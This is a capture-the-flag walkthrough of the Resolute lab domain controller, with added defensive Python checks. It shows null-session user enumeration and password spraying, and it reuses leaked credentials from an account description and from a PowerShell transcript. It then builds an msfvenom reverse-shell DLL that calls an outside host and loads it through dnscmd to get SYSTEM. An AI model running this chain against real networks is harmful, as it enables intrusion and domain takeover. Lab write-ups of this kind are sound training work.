Enumeration
We start the machine by scanning its ports with nmap, where we find several Active Directory ports open, among them SMB, Kerberos and others.
❯ nmap 10.10.10.169
Nmap scan report for 10.10.10.169
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49671/tcp open unknown
49676/tcp open unknown
49677/tcp open unknown
49686/tcp open unknown
49743/tcp open unknown
With crackmapexec we can get information about the machine, such as the domain, which is megabank.local, and the hostname, which appears to be resolute.
❯ crackmapexec smb 10.10.10.169
SMB 10.10.10.169 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
For possible later attacks, or simply for convenience, we add the domain to /etc/hosts, along with the machine's name (it is the DC) as another hostname.
❯ echo "10.10.10.169 megabank.local resolute.megabank.local" | sudo tee -a /etc/hosts
Connecting with rpcclient as a null user lets us enumerate users.
❯ rpcclient -N -U '' megabank.local
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[ryan] rid:[0x451]
user:[marko] rid:[0x457]
user:[sunita] rid:[0x19c9]
user:[abigail] rid:[0x19ca]
user:[marcus] rid:[0x19cb]
user:[sally] rid:[0x19cc]
user:[fred] rid:[0x19cd]
user:[angela] rid:[0x19ce]
user:[felicia] rid:[0x19cf]
user:[gustavo] rid:[0x19d0]
user:[ulf] rid:[0x19d1]
user:[stevie] rid:[0x19d2]
user:[claire] rid:[0x19d3]
user:[paulo] rid:[0x19d4]
user:[steve] rid:[0x19d5]
user:[annette] rid:[0x19d6]
user:[annika] rid:[0x19d7]
user:[per] rid:[0x19d8]
user:[claude] rid:[0x19d9]
user:[melanie] rid:[0x2775]
user:[zach] rid:[0x2776]
user:[simon] rid:[0x2777]
user:[naoki] rid:[0x2778]
rpcclient $>
Running enumdomusers and applying a few regular expressions to rpcclient's output, we can build a wordlist with every user in the domain.
❯ rpcclient -N -U '' megabank.local -c enumdomusers | grep -oP '\[\D*?\]' | tr -d '[]' | tee users.txt
Administrator
Guest
krbtgt
DefaultAccount
ryan
marko
sunita
abigail
marcus
sally
fred
angela
felicia
gustavo
ulf
stevie
claire
paulo
steve
annette
annika
per
claude
melanie
zach
simon
naoki
Trying ASREPRoast against each of them, we see that none is vulnerable.
❯ impacket-GetNPUsers megabank.local/ -no-pass -usersfile users.txt
Impacket v0.11.0 - Copyright 2023 Fortra
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User ryan doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User marko doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sunita doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User abigail doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User marcus doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sally doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User fred doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User angela doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User felicia doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User gustavo doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ulf doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User stevie doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User claire doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User paulo doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User steve doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User annette doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User annika doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User per doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User claude doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User melanie doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User zach doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User simon doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User naoki doesn't have UF_DONT_REQUIRE_PREAUTH set
With queryuser we can see user information, such as the description.
rpcclient $> queryuser Administrator
User Name : Administrator
Full Name :
Home Drive :
Dir Drive :
Profile Path:
Logon Script:
Description : Built-in account for administering the computer/domain
Workstations:
Comment :
Remote Dial :
Logon Time : jue, 29 jun 2023 20:13:56 EDT
Logoff Time : mié, 31 dic 1969 19:00:00 EST
Kickoff Time : mié, 31 dic 1969 19:00:00 EST
Password last set Time : jue, 29 jun 2023 20:23:03 EDT
Password can change Time : vie, 30 jun 2023 20:23:03 EDT
Password must change Time: mié, 13 sep 30828 22:48:05 EDT
unknown_2[0..31]...
user_rid : 0x1f4
group_rid: 0x201
acb_info : 0x00000210
fields_present: 0x00ffffff
logon_divs: 168
bad_password_count: 0x00000000
logon_count: 0x00000059
padding1[0..7]...
logon_hrs[0..21]...
rpcclient $>
Shell - melanie
Iterating over each of the users we can view its description; in marko's case we find a plaintext password for a newly created account.
❯ for user in $(cat users.txt); do rpcclient -N -U "" megabank.local -c "queryuser $user"; done | grep -E "User Name|Description"
User Name : Administrator
Description : Built-in account for administering the computer/domain
User Name : Guest
Description : Built-in account for guest access to the computer/domain
User Name : krbtgt
Description : Key Distribution Center Service Account
User Name : DefaultAccount
Description : A user account managed by the system.
User Name : ryan
Description :
User Name : marko
Description : Account created. Password set to Welcome123!
User Name : sunita
Description :
User Name : abigail
Description :
User Name : marcus
Description :
..................................................................................
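As an added defender-side example (not part of the original writeup), the following Python parses rpcclient's enumdomusers and queryuser output, as this section does with grep, and flags Description fields that look like they carry a credential, such as marko's. The samples are constructed from the output above and the keyword heuristic is my own assumption.

```python
import re

# Constructed samples in the layout of rpcclient's enumdomusers output and of
# the "User Name"/"Description" pairs grepped out of queryuser on this page.
SAMPLE_ENUM = """\
user:[Administrator] rid:[0x1f4]
user:[ryan] rid:[0x451]
user:[marko] rid:[0x457]
"""
SAMPLE_QUERYUSER = """\
User Name : Administrator
Description : Built-in account for administering the computer/domain
User Name : ryan
Description :
User Name : marko
Description : Account created. Password set to Welcome123!
User Name : sunita
Description :
"""

ENUM_LINE = re.compile(r"user:\[(?P<name>[^\]]+)\]\s+rid:\[(?P<rid>0x[0-9a-fA-F]+)\]")
# Keyword followed by "set to", "is", "=" or ":" and then a token: the shape of
# a credential pasted into a description (assumption: my own heuristic).
SECRET_HINT = re.compile(
    r"\b(?:password|passwd|pwd|pass|contrase[ñn]a)\b.*?"
    r"(?:(?<![a-z])(?:set to|is)\b|[=:])\s*(?P<secret>\S+)",
    re.IGNORECASE,
)

def parse_enumdomusers(text):
    """Map each SAM account name to its RID as an int."""
    return {m["name"]: int(m["rid"], 16) for m in ENUM_LINE.finditer(text)}

def parse_queryuser(text):
    """Turn 'User Name'/'Description' line pairs into {user: description}."""
    users, current = {}, None
    for line in text.splitlines():
        key, _, value = line.partition(":")
        key, value = key.strip(), value.strip()
        if key == "User Name":
            current = value
            users[current] = ""
        elif key == "Description" and current is not None:
            users[current] = value
    return users

def find_leaked_secrets(users):
    """Return [(user, redacted_description)] for descriptions that look like they
    embed a credential; the candidate secret is masked so the finding can be
    logged without copying the value around."""
    findings = []
    for user, desc in users.items():
        m = SECRET_HINT.search(desc)
        if m:
            secret = m["secret"]
            masked = secret[0] + "*" * (len(secret) - 1)
            findings.append((user, desc.replace(secret, masked)))
    return findings
```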
We can run a password spray to test the password from the description against the whole user list; the user melanie comes back as valid.
❯ crackmapexec smb megabank.local -u users.txt -p Welcome123! --continue-on-success
SMB megabank.local 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB megabank.local 445 RESOLUTE [-] megabank.local\Administrator:Welcome123! STATUS_LOGON_FAILURE
SMB megabank.local 445 RESOLUTE [-] megabank.local\Guest:Welcome123! STATUS_LOGON_FAILURE
SMB megabank.local 445 RESOLUTE [-] megabank.local\krbtgt:Welcome123! STATUS_LOGON_FAILURE
SMB megabank.local 445 RESOLUTE [-] megabank.local\DefaultAccount:Welcome123! STATUS_LOGON_FAILURE
SMB megabank.local 445 RESOLUTE [-] megabank.local\ryan:Welcome123! STATUS_LOGON_FAILURE
SMB megabank.local 445 RESOLUTE [-] megabank.local\marko:Welcome123! STATUS_LOGON_FAILURE
SMB megabank.local 445 RESOLUTE [-] megabank.local\sunita:Welcome123! STATUS_LOGON_FAILURE
SMB megabank.local 445 RESOLUTE [-] megabank.local\abigail:Welcome123! STATUS_LOGON_FAILURE
SMB megabank.local 445 RESOLUTE [-] megabank.local\marcus:Welcome123! STATUS_LOGON_FAILURE
SMB megabank.local 445 RESOLUTE [-] megabank.local\sally:Welcome123! STATUS_LOGON_FAILURE
SMB megabank.local 445 RESOLUTE [-] megabank.local\fred:Welcome123! STATUS_LOGON_FAILURE
SMB megabank.local 445 RESOLUTE [-] megabank.local\angela:Welcome123! STATUS_LOGON_FAILURE
SMB megabank.local 445 RESOLUTE [-] megabank.local\felicia:Welcome123! STATUS_LOGON_FAILURE
SMB megabank.local 445 RESOLUTE [-] megabank.local\gustavo:Welcome123! STATUS_LOGON_FAILURE
SMB megabank.local 445 RESOLUTE [-] megabank.local\ulf:Welcome123! STATUS_LOGON_FAILURE
SMB megabank.local 445 RESOLUTE [-] megabank.local\stevie:Welcome123! STATUS_LOGON_FAILURE
SMB megabank.local 445 RESOLUTE [-] megabank.local\claire:Welcome123! STATUS_LOGON_FAILURE
SMB megabank.local 445 RESOLUTE [-] megabank.local\paulo:Welcome123! STATUS_LOGON_FAILURE
SMB megabank.local 445 RESOLUTE [-] megabank.local\steve:Welcome123! STATUS_LOGON_FAILURE
SMB megabank.local 445 RESOLUTE [-] megabank.local\annette:Welcome123! STATUS_LOGON_FAILURE
SMB megabank.local 445 RESOLUTE [-] megabank.local\annika:Welcome123! STATUS_LOGON_FAILURE
SMB megabank.local 445 RESOLUTE [-] megabank.local\per:Welcome123! STATUS_LOGON_FAILURE
SMB megabank.local 445 RESOLUTE [-] megabank.local\claude:Welcome123! STATUS_LOGON_FAILURE
SMB megabank.local 445 RESOLUTE [+] megabank.local\melanie:Welcome123!
SMB megabank.local 445 RESOLUTE [-] megabank.local\zach:Welcome123! STATUS_LOGON_FAILURE
SMB megabank.local 445 RESOLUTE [-] megabank.local\simon:Welcome123! STATUS_LOGON_FAILURE
SMB megabank.local 445 RESOLUTE [-] megabank.local\naoki:Welcome123! STATUS_LOGON_FAILURE
Although we now have a valid credential, it grants us no special privilege over the SMB shares, apart from a couple of READ permissions on default shares.
❯ crackmapexec smb megabank.local -u melanie -p Welcome123! --shares
SMB megabank.local 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB megabank.local 445 RESOLUTE [+] megabank.local\melanie:Welcome123!
SMB megabank.local 445 RESOLUTE [+] Enumerated shares
SMB megabank.local 445 RESOLUTE Share Permissions Remark
SMB megabank.local 445 RESOLUTE ----- ----------- ------
SMB megabank.local 445 RESOLUTE ADMIN$ Remote Admin
SMB megabank.local 445 RESOLUTE C$ Default share
SMB megabank.local 445 RESOLUTE IPC$ Remote IPC
SMB megabank.local 445 RESOLUTE NETLOGON READ Logon server share
SMB megabank.local 445 RESOLUTE SYSVOL READ Logon server share
Testing them against WinRM returns Pwn3d!, which means these credentials are valid for WinRM, so we can get a shell.
❯ crackmapexec winrm megabank.local -u melanie -p Welcome123!
SMB megabank.local 5985 RESOLUTE [*] Windows 10.0 Build 14393 (name:RESOLUTE) (domain:megabank.local)
HTTP megabank.local 5985 RESOLUTE [*] http://megabank.local:5985/wsman
WINRM megabank.local 5985 RESOLUTE [+] megabank.local\melanie:Welcome123! (Pwn3d!)
Using evil-winrm we can connect and get a PowerShell as melanie.
❯ evil-winrm -i megabank.local -u melanie -p Welcome123!
PS C:\Users\melanie\Documents> whoami
megabank\melanie
PS C:\Users\melanie\Documents> type ..\Desktop\user.txt
070**************************79f
PS C:\Users\melanie\Documents>
Shell - ryan
Listing C:\ at first we find nothing interesting; however, using -force we can see a hidden directory, PSTranscripts.
PS C:\> dir
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/25/2019 6:19 AM PerfLogs
d-r--- 9/25/2019 12:39 PM Program Files
d----- 11/20/2016 6:36 PM Program Files (x86)
d-r--- 12/4/2019 2:46 AM Users
d----- 12/4/2019 5:15 AM Windows
PS C:\> dir -force
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hs- 12/3/2019 6:40 AM $RECYCLE.BIN
d--hsl 9/25/2019 10:17 AM Documents and Settings
d----- 9/25/2019 6:19 AM PerfLogs
d-r--- 9/25/2019 12:39 PM Program Files
d----- 11/20/2016 6:36 PM Program Files (x86)
d--h-- 9/25/2019 10:48 AM ProgramData
d--h-- 12/3/2019 6:32 AM PSTranscripts
d--hs- 9/25/2019 10:17 AM Recovery
d--hs- 9/25/2019 6:25 AM System Volume Information
d-r--- 12/4/2019 2:46 AM Users
d----- 12/4/2019 5:15 AM Windows
-arhs- 11/20/2016 5:59 PM 389408 bootmgr
-a-hs- 7/16/2016 6:10 AM 1 BOOTNXT
-a-hs- 6/29/2023 5:12 PM 402653184 pagefile.sys
PS C:\>
Inside it we find another directory named 20191203, which contains a .txt file.
PS C:\> cd PSTranscripts
PS C:\PSTranscripts> dir -force
Directory: C:\PSTranscripts
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--h-- 12/3/2019 6:45 AM 20191203
PS C:\PSTranscripts> cd 20191203
PS C:\PSTranscripts\20191203> dir -force
Directory: C:\PSTranscripts\20191203
Mode LastWriteTime Length Name
---- ------------- ------ ----
-arh-- 12/3/2019 6:45 AM 3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
PS C:\PSTranscripts\20191203>
It contains the record of several commands; among them a net use command stands out, in which it authenticates as the user ryan against an SMB share.
PS C:\PSTranscripts\20191203> type PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
**********************
Windows PowerShell transcript start
Start time: 20191203063201
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
........................................................................................................................
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
........................................................................................................................
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
PS C:\PSTranscripts\20191203>
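An added example, not from the original writeup: a Python audit of PSTranscripts files that reconstructs each session's header and the Invoke-Expression commands it logged, and reports net use invocations that carry a password (redacted), which is how a defender would find the ryan credential before anyone else does. The sample transcript is constructed from the one above, and the '<user> <password>' reading of the bare tokens is taken from that transcript.

```python
import re

# Constructed sample in the layout of a PowerShell transcript file; the header
# fields and the net use line mirror the transcript quoted on this page.
SAMPLE_TRANSCRIPT = r"""**********************
Windows PowerShell transcript start
Start time: 20191203063201
Username: MEGABANK\ryan
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
**********************
**********************
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
**********************
"""

HEADER_FIELD = re.compile(r"^([A-Za-z][A-Za-z ]*): (.*)$")
COMMAND_VALUE = re.compile(r'name="Command"; value="(.*?)"\s*\n(?=>>|\*{5,})', re.DOTALL)
NET_USE = re.compile(r"\bnet\s+use\b(.*)", re.IGNORECASE)

def parse_transcript(text):
    """One session per 'transcript start' banner: header fields plus commands."""
    sessions = []
    for chunk in text.split("Windows PowerShell transcript start")[1:]:
        header = {}
        for line in chunk.splitlines()[1:]:
            if line.startswith("****"):
                break  # end of the header block
            if m := HEADER_FIELD.match(line):
                header[m.group(1)] = m.group(2)
        commands = [c.strip() for c in COMMAND_VALUE.findall(chunk)]
        sessions.append({"header": header, "commands": commands})
    return sessions

def net_use_credentials(command):
    """Share, account and password material from a net use invocation. Bare
    tokens are credential material, read as '<user> <password>' when no
    /user: switch is present (the form in this page's transcript)."""
    if not (m := NET_USE.search(command)):
        return None
    share, user, free = None, None, []
    for tok in m.group(1).split():
        if tok.lower().startswith("/user:"):
            user = tok[len("/user:"):]
        elif tok.startswith("\\\\"):
            share = tok
        elif not (tok.startswith("/") or re.fullmatch(r"[A-Za-z]:", tok)):
            free.append(tok)
    if user is None and len(free) >= 2:
        user, free = free[0], free[1:]
    redacted = m.group(0)
    for secret in free:
        redacted = redacted.replace(secret, "<redacted>")
    return {"share": share, "user": user, "password_present": bool(free), "redacted": redacted}

def audit_transcript(text):
    """Every net use carrying a password, tagged with the session's Username."""
    return [{"ran_by": s["header"].get("Username"), **cred}
            for s in parse_transcript(text) for cmd in s["commands"]
            if (cred := net_use_credentials(cmd)) and cred["password_present"]]
```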
Testing these credentials against SMB returns Pwn3d!; however, this user has no write permission (WRITE) on any SMB share.
❯ crackmapexec smb megabank.local -u ryan -p Serv3r4Admin4cc123!
SMB megabank.local 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB megabank.local 445 RESOLUTE [+] megabank.local\ryan:Serv3r4Admin4cc123! (Pwn3d!)
❯ crackmapexec smb megabank.local -u ryan -p Serv3r4Admin4cc123! --shares
SMB megabank.local 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB megabank.local 445 RESOLUTE [+] megabank.local\ryan:Serv3r4Admin4cc123! (Pwn3d!)
SMB megabank.local 445 RESOLUTE [+] Enumerated shares
SMB megabank.local 445 RESOLUTE Share Permissions Remark
SMB megabank.local 445 RESOLUTE ----- ----------- ------
SMB megabank.local 445 RESOLUTE ADMIN$ Remote Admin
SMB megabank.local 445 RESOLUTE C$ Default share
SMB megabank.local 445 RESOLUTE IPC$ Remote IPC
SMB megabank.local 445 RESOLUTE NETLOGON READ Logon server share
SMB megabank.local 445 RESOLUTE SYSVOL READ Logon server share
Testing these credentials against WinRM again returns that they are valid.
❯ crackmapexec winrm megabank.local -u ryan -p Serv3r4Admin4cc123!
SMB megabank.local 5985 RESOLUTE [*] Windows 10.0 Build 14393 (name:RESOLUTE) (domain:megabank.local)
HTTP megabank.local 5985 RESOLUTE [*] http://megabank.local:5985/wsman
WINRM megabank.local 5985 RESOLUTE [+] megabank.local\ryan:Serv3r4Admin4cc123! (Pwn3d!)
We can connect using evil-winrm and get a PowerShell as ryan.
❯ evil-winrm -i megabank.local -u ryan -p Serv3r4Admin4cc123!
PS C:\Users\ryan\Documents> whoami
megabank\ryan
PS C:\Users\ryan\Documents>
Shell - Administrator
After enumerating the domain and uploading the collected information to BloodHound, we find that the user ryan is a member of the DNSAdmins group.
In LOLBAS we find a way, via dnscmd, to load a DLL when the service starts. We begin by creating a malicious DLL and serving it from an SMB share.
❯ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.10 LPORT=443 -f dll -o shell.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of dll file: 9216 bytes
Saved as: shell.dll
❯ impacket-smbserver kali . -smb2support
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
We start by configuring the DNS service with dnscmd so that, on startup, it loads the malicious DLL we created earlier from our SMB share.
PS C:\Users\ryan\Documents> dnscmd /config /serverlevelplugindll \\10.10.14.10\kali\shell.dll
Registry property serverlevelplugindll successfully reset.
Command completed successfully.
PS C:\Users\ryan\Documents>
Now all that remains is to stop and start the DNS service using sc.exe.
PS C:\Users\ryan\Documents> sc.exe stop dns
SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 3 STOP_PENDING
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
PS C:\Users\ryan\Documents> sc.exe start dns
SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 3932
FLAGS :
PS C:\Users\ryan\Documents>
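Added defender-side check, not from the original writeup or from LOLBAS: Python that rates the ServerLevelPluginDll value under HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters, the registry property dnscmd changed above, either live on a Windows DNS server or from exported reg query output. The key path is the documented location of that property; the reg query sample and the rating scheme are my own assumptions.

```python
import re

# Registry value that dnscmd /config /serverlevelplugindll sets; reading it
# live requires running on the DNS server itself (winreg is Windows-only).
DNS_PARAMS_KEY = r"SYSTEM\CurrentControlSet\Services\DNS\Parameters"
VALUE_NAME = "ServerLevelPluginDll"

# Constructed sample of `reg query` output for offline review of an exported
# value (layout assumed from the tool's usual output, not taken from this page).
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS\Parameters
    ServerLevelPluginDll    REG_SZ    \\10.10.14.10\kali\shell.dll
    EnableGlobalQueryBlockList    REG_DWORD    0x1
"""

REG_LINE = re.compile(r"^\s*(\S+)\s+(REG_\w+)\s+(.*?)\s*$")

def parse_reg_query(text):
    """Return the ServerLevelPluginDll data from reg query output, or None."""
    for line in text.splitlines():
        m = REG_LINE.match(line)
        if m and m.group(1).lower() == VALUE_NAME.lower():
            return m.group(3)
    return None

def classify_plugin_dll(value):
    """Rate the configured plugin DLL:
    clean      - value absent or empty (the default)
    critical   - UNC path: the DNS service, running as SYSTEM, would load the
                 DLL from another host, which is the path used on this page
    review     - a DLL under System32, which still needs its hash verified
    suspicious - any other local path"""
    if not value or not value.strip():
        return "clean"
    path = value.strip().strip('"')
    if path.startswith("\\\\"):
        return "critical"
    normalized = path.lower().replace("/", "\\").replace("%systemroot%", "c:\\windows")
    if re.fullmatch(r"[a-z]:\\windows\\system32\\[^\\]+\.dll", normalized):
        return "review"
    return "suspicious"

def read_plugin_dll():
    """Read the live value on a Windows DNS server; None where winreg is
    unavailable, '' when the value is not set."""
    try:
        import winreg
    except ImportError:
        return None
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, DNS_PARAMS_KEY) as key:
            return winreg.QueryValueEx(key, VALUE_NAME)[0]
    except FileNotFoundError:
        return ""
```

Alongside the registry value, an unexpected stop/start of the DNS service by a DNSAdmins member is the other signal this procedure leaves behind.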
When the service starts again, it makes a request to our machine as the machine account RESOLUTE$, and on loading the malicious DLL it sends us a reverse shell.
❯ impacket-smbserver kali . -smb2support
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.169,50763)
[*] AUTHENTICATE_MESSAGE (MEGABANK\RESOLUTE$,RESOLUTE)
[*] User RESOLUTE\RESOLUTE$ authenticated successfully
[*] RESOLUTE$::MEGABANK:aaaaaaaaaaaaaaaa:6a5f93f3e287203626c14e32c63b50a5:010100000000000080e22c24eeaad901ac96772e9f34a36a00000000010010005a006c004f0071006b006c0068006700030010005a006c004f0071006b006c0068006700020010004d0042007600490047006e007a005a00040010004d0042007600490047006e007a005a000700080080e22c24eeaad901060004000200000008003000300000000000000000000000004000006c14702b8a0a5bcb8a5cb0083ee71d6f249b57c4dd8542761efb111e279d89350a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e00310034002e003100350035000000000000000000
[*] Connecting Share(1:kali)
[*] Disconnecting Share(1:kali)
[*] Closing down connection (10.10.10.169,50763)
[*] Remaining connections []
The shell we receive runs as nt authority\system, which has the highest privileges on the host, so we can now read the Administrator flag.
❯ sudo netcat -lvnp 443
Listening on 0.0.0.0 443
Connection received on 10.10.10.169
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
004**************************5a8
C:\Windows\system32>